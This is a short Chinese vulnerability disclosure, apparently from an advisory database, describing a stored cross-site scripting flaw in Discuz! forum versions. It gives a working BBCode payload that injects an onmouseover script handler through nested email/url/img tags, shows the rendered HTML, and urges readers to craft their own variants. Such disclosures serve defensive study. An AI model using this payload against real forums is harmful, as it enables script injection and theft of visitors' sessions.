Discuz!多版本 存储型XSS脚本漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年DZ不断的更新版本,但此漏洞依然存在,今天就发布出来吧!留着也没什么用会长毛的,呵呵。 在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。 当时我们一起测试的是DZ6.0-DZ7.2,不知道是不是通杀啊。哈哈!没有一个一个去测试。有条件的去测试一下吧。 ### 详细说明: 发贴进入源码模式,写入如下的exp ``` [email][url][img]http://qhkest.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email] ``` 上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!!! 附上XSS完的源码如下: ``` <a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\&quot;_blank\&quot;"><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a>< ``` 我想你们一看就明白了吧!!! ### 漏洞证明: 本地测试结果: Discuz! X2 [<img src="https://images.seebug.org/upload/201106/2314314576a4f539c55c5391a0e69aaacf40e3ee.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201106/2314314576a4f539c55c5391a0e69aaacf40e3ee.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息